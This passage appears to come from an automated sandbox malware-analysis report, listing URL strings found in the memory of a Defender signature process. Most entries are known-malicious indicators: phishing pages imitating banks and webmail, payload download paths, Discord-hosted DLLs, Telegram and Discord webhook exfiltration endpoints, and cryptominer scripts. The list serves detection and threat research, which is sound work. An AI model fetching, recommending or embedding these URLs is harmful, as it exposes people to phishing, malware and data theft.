Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://aouscchakwal.000webhostapp.com/hot.phpmethod=
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://asgvprotecao.com.br/wa_php/clZ&LpN-omp/klbd5vxr6mf38o/YxSlZ&LpN-slZ&LpN-9udRlZ&LpN-8U.plZ&Lp
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://backparloursoup.xyz//meme/cors/send.php
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://beer.appi.top/?74c96ea1gmz9qipluhdvtw6q7ekn6e0upb
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://begumprinters.com/css/absa/php/absajslogo.php?r=
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://bemojo.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2g8qrgl
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2zbes5a
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: https://bitly.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://bizimi.com/aa-manage/post/ftp/themes/nazl/phpnet.php?code=2000700
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/reportmaersk.php
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://bonshyonloire.ml/exploit/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://boyscoutsram.com/c2hhd2v6x2jhbnvyaubiyxquy29t
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://btchs.com.br/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://builderdoc.org/life/direct.php)
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://buildingsandpools.com/wp-content/iy6ux613260
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://businessonline.o2.co.uk/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer.bauer
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://c-up.xyz/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://caixadirecta.cgd.pt
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://canary.discord.com/api/webhooks/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://capirtos.r1-it.stora
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://carmelavalles.com/site/wp-admin/
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://cartsmars.info/okmn/
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/844726578415665236/846209246264688650/
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://cheelersplus.xyz/audio/z2fyes5jywxsywdoyw5achjvdgl2axrplmnvbq==
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://cld.pt/dl/download/30e57a1d-338a-4c1b-9ad9-db0220f77ef0/bruto.jpg
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://clicks.life/care/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: https://cmail.daum.net/v2/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://coffreo.biz/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp	String found in binary or memory: https://configdl.teamviewer.com/configs
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.info
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://creative-island.e-m2.net/wp-content/themes/creative_island/js/vc-composer/RUpDObeysEFp8.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://crypto-loot.com/lib/miner.min.js
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://cryptotreasurytrust.com/vnV
Source: RegAsm.exe, 0000000A.00000003.2601345289.00000000015A3000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/tbcyxag
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://dailcarespop.ddnsking.com/audio/cmfuzhkuyxjta25ly2h0qhbyb3rpdml0as5jb20=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://dancevida.com/css/app.css
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://dasinvestment.us/ty/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://de.gsearch.com.de/api/update.sh
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://deenar.com/sashi/y29ylnn0b2x3awprqg5uaxauy29t
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://defineliving.in/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://demottechamber.org/html
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.null.vg/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://dev1.whoatemyI
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
